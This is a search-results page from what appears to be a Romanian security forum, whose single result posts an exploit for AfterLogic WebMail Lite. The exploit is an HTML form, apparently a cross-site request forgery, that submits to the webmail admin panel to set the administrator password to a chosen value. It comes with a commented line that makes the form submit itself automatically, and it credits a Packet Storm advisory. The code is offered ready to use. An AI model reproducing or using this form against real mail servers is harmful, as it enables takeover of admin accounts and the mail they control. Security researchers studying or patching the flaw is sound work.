Jump to content

Search the Community

Showing results for tags 'lite'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 1 result

  1. AfterLogic WebMail Lite is a free web-based IMAP and SMTP email-client with Ajax interface. AfterLogic WebMail Lite is available for both PHP and ASP.NET platforms. The version of AfterLogic WebMail Lite that is written in PHP is free and open-source software subject to the terms of the Affero General Public License (AGPL) version 3. The version written in ASP.NET is proprietary software available as freeware. And is deployed over 5/20 mailsevers, quite popular. This exploit attempts to exploit the admin and get(s) us a new password to the admin panel which should be located at site.com/mail/adminpanel/index.php <h2>After Logic Mail - Change Admin Password Exploit</h2> <form action="http://localhost/webmail/adminpanel/index.php?submit" method="POST" id="security_form"> <input type="hidden" name="form_id" value="security"> <input type="text" class="wm_input" name="txtUserName" id="txtUserName" value="mailadm" size="30" /> <input type="password" class="wm_input" name="txtNewPassword" id="txtNewPassword" value="newpass" size="30" /> <input type="password" class="wm_input" name="txtConfirmNewPassword" id="txtConfirmNewPassword" value="newpass" size="30" /> <input type="submit" name="submit_btn" value="Save" id="automate"> </form> <script> //uncomment the second line for automation //document.getElementById('automate').click(); </script> Source: http://dl.packetstormsecurity.net/1503-exploits/afterlogic-bypass.txt
×
×
  • Create New...